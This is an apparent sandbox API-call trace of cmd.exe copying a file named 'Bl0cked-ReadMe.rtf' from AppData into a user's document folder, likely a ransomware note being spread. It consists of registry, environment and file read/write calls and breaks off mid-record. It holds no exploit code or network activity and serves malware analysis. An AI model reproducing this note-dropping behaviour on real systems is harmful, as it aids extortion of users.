[0140.565] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.565] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.565] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eff0c | out: phkResult=0x1eff0c*=0x0) returned 0x2 [0140.565] VirtualQuery (in: lpAddress=0x1eff43, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.565] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efedc, dwLength=0x1c | out: lpBuffer=0x1efedc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.565] GetConsoleOutputCP () returned 0x1b5 [0140.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.566] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.566] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0140.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.566] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.566] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.567] GetEnvironmentStringsW () returned 0x2e0198* [0140.567] FreeEnvironmentStringsW (penv=0x2e0198) returned 1 [0140.567] GetEnvironmentStringsW () returned 0x2e0198* [0140.567] FreeEnvironmentStringsW (penv=0x2e0198) returned 1 [0140.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee7c | out: phkResult=0x1eee7c*=0x40) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0xc0, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | 
out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x0, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.567] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.567] RegCloseKey (hKey=0x40) returned 0x0 [0140.568] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee7c | out: phkResult=0x1eee7c*=0x40) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x40, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x1, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x0, lpcbData=0x1eee80*=0x4) 
returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x9, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x4, lpData=0x1eee88*=0x9, lpcbData=0x1eee80*=0x4) returned 0x0 [0140.568] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee84, lpData=0x1eee88, lpcbData=0x1eee80*=0x1000 | out: lpType=0x1eee84*=0x0, lpData=0x1eee88*=0x9, lpcbData=0x1eee80*=0x1000) returned 0x2 [0140.568] RegCloseKey (hKey=0x40) returned 0x0 [0140.568] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.568] srand (_Seed=0x5b88636f) [0140.568] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0140.568] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0140.568] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.568] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.569] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.569] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.569] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.569] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.569] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.569] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.569] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.569] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.569] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.569] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.569] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.569] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.569] GetEnvironmentStringsW () returned 0x2e22e8* [0140.569] FreeEnvironmentStringsW (penv=0x2e22e8) returned 1 [0140.569] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.569] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.569] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.569] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.569] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.569] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.570] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.570] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.570] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.570] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.570] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efc48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.570] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efc48, lpFilePart=0x1efc44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efc44*="Desktop") returned 0x18 [0140.570] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.570] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef9c4 | out: lpFindFileData=0x1ef9c4) returned 0x2e0028 [0140.570] FindClose (in: hFindFile=0x2e0028 | out: hFindFile=0x2e0028) returned 1 [0140.570] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef9c4 | out: lpFindFileData=0x1ef9c4) returned 0x2e0028 [0140.570] FindClose (in: hFindFile=0x2e0028 | out: hFindFile=0x2e0028) returned 1 [0140.570] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef9c4 | out: lpFindFileData=0x1ef9c4) returned 0x2e0028 [0140.571] FindClose (in: hFindFile=0x2e0028 | out: hFindFile=0x2e0028) returned 1 [0140.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.571] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.571] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.571] GetEnvironmentStringsW () returned 0x2e2b08* [0140.571] FreeEnvironmentStringsW (penv=0x2e2b08) returned 1 [0140.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.572] GetConsoleOutputCP () returned 0x1b5 [0140.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.572] GetUserDefaultLCID () returned 0x409 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x1efd88, cchData=128 | out: lpLCData="0") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd88, cchData=128 | out: lpLCData="0") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd88, cchData=128 | out: lpLCData="1") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.573] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.574] GetConsoleTitleW (in: lpConsoleTitle=0x2d08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.574] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.574] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.574] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.575] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.575] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.575] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.575] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.575] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.575] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.575] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.580] GetFileType (hFile=0x7) returned 0x2 [0140.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.999] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efc80 | out: lpMode=0x1efc80) returned 1 [0141.000] _dup (_FileHandle=1) returned 3 [0141.000] _close (_FileHandle=1) returned 0 [0141.000] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0141.000] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1efc50, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0141.000] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0141.000] GetConsoleTitleW (in: lpConsoleTitle=0x1efa80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.001] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0141.001] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0141.001] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0141.001] _wcsicmp 
(_String1="type", _String2="TYPE") returned 0 [0141.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.002] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef5e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef5e4) returned 0x2d0e90 [0141.002] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0141.002] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0141.002] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0141.002] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee4f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0141.003] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] GetFileType (hFile=0x54) returned 0x1 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ee548 | out: lpFileSizeHigh=0x1ee548*=0x0) returned 0x1632 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.003] 
GetFileType (hFile=0x4c) returned 0x1 [0141.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.003] GetFileType (hFile=0x4c) returned 0x1 [0141.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.003] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.004] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 
[0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.006] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.006] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.007] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.007] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: 